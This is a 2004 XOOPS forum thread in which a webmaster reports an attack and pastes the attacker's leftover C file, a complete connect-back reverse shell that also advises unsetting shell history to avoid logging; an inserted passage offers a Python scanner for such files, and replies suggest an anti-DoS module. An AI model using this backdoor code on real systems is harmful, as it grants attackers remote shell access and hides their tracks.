1
winds
DOS - space quota - Attack! Need help!
  • 2004/2/1 23:23

  • winds

  • Just popping in

  • Posts: 10

  • Since: 2004/1/14


My XOOPS web site is down because of a classic DOS -space quota- attack.

The web site is on an Apache, Linux server...

I found this temp file on the server, left by the attacker; maybe it could give you more info:

" #include
#include
#include
#include
#include
int main(int argc, char **argv) {
char *host;
int port = 80;
int f;
int l;
int sock;
struct in_addr ia;
struct sockaddr_in sin, from;
struct hostent *he;
char msg[ ] = "Bem Vindo Creative_MX Let's Hack\n\n"
"Issue \"export TERM=xterm; exec bash -i\"\n"
"For More Reliable Shell.\n"
"Issue \"unset HISTFILE; unset SAVEHIST\"\n"
"For Not Getting Logged.\n(;\n\n";
printf("Ir4dex Connect Back Backdoor\n\n");
if (argc < 2 || argc > 3) {
printf("Usage: %s [Host] \n", argv[0]);
return 1;
}
printf("[*] Dumping Arguments\n");
l = strlen(argv[1]);
if (l <= 0) {
printf("[-] Invalid Host Name\n");
return 1;
}
if (!(host = (char *) malloc(l))) {
printf("[-] Unable to Allocate Memory\n");
return 1;
}
strncpy(host, argv[1], l);
if (argc == 3) {
port = atoi(argv[2]);
if (port <= 0 || port > 65535) {
printf("[-] Invalid Port Number\n");
return 1;
}
}
printf("[*] Resolvendo Nome Do Host\n");
he = gethostbyname(host);
if (he) {
memcpy(&ia.s_addr, he->h_addr, 4);
} else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
printf("[-] Unable to Resolve: %s\n", host);
return 1;
}
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = ia.s_addr;
sin.sin_port = htons(port);
printf("[*] Conectando...\n");
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Socket Error\n");
return 1;
}
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
printf("[-] Unable to Connect\n");
return 1;
}
printf("[*] Spawning Shell\n");
f = fork( );
if (f < 0) {
printf("[-] Unable to Fork\n");
return 1;
} else if (!f) {
write(sock, msg, sizeof(msg));
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl("/bin/sh", "shell", NULL);
close(sock);
return 0;
}
printf("[*] Conectado\n\n");
return 0;
} "


Does anybody know a quick fix for this? Please!
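
The file quoted in the post above labels itself a "Connect Back Backdoor": it makes an outbound `connect()`, duplicates the socket onto descriptors 0, 1 and 2, and executes `/bin/sh`. As an added example (not part of the thread), this Python sketch flags files with those traits under a directory such as a web root or temp directory; the function names, regex heuristics and the constructed samples are assumptions for illustration.

```python
import re
from pathlib import Path

# Traits taken from the C file quoted in the post: outbound connect(),
# socket duplicated onto stdin/stdout/stderr, then exec of a shell.
CONNECT = re.compile(r"\bconnect\s*\(")
DUP2 = re.compile(r"\bdup2\s*\(\s*\w+\s*,\s*([012])\s*\)")
EXEC_SHELL = re.compile(r"\bexec[lv]p?e?\s*\(\s*\"(/bin/(?:ba|da|k|z)?sh)\"")
HISTORY = re.compile(r"unset\s+HISTFILE|unset\s+SAVEHIST")

# Constructed sample: a few lines excerpted from the quoted file.
SAMPLE = r'''
"Issue \"unset HISTFILE; unset SAVEHIST\"\n"
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl("/bin/sh", "shell", NULL);
'''
# Constructed benign sample: an ordinary client that only connects and writes.
BENIGN = r'''
connect(sock, (struct sockaddr *)&sin, sizeof(sin));
dup2(logfd, 1);
write(sock, "GET / HTTP/1.0\r\n\r\n", 18);
'''

def classify(source):
    """Return which connect-back traits appear in one file's text."""
    fds = {int(m.group(1)) for m in DUP2.finditer(source)}
    shell = EXEC_SHELL.search(source)
    out = {"outbound_connect": bool(CONNECT.search(source)),
           "stdio_redirected": fds == {0, 1, 2},
           "shell": shell.group(1) if shell else None,
           "history_evasion": bool(HISTORY.search(source))}
    # All three traits together are what make it a connect-back shell.
    out["reverse_shell"] = (out["outbound_connect"]
                            and out["stdio_redirected"] and shell is not None)
    return out

def scan_tree(root, max_bytes=1_000_000):
    """List regular files under root whose text matches all three traits."""
    hits = []
    for path in Path(root).rglob("*"):
        try:
            if path.is_symlink() or not path.is_file():
                continue
            if path.stat().st_size > max_bytes:
                continue
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        if classify(text)["reverse_shell"]:
            hits.append(str(path))
    return sorted(hits)
```

This only matches source text; a compiled copy of the same program would need a different check, such as looking for processes whose descriptors 0 to 2 point at a socket.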

2
sunsnapper
Re: DOS - space quota - Attack! Need help!

There is an anti-DOS attack module.

I don't know if it will help in your case, but it may be worth a shot.
https://xoops.org/modules/mydownloads/singlefile.php?cid=24&lid=483

3
winds
Re: DOS - space quota - Attack! Need help!
  • 2004/2/2 4:21



Thanks Suns

I will install this module for future protection. I should have done it before, because it's the third time that somebody did damage to my site. I really don't know why. It seems that this time the attack is more serious than before... I fixed one thing, but found the other...

Thanks again.

4
winds
Re: DOS - space quota - Attack! Need help!
  • 2004/2/2 10:58



The site is ok now, or for now.
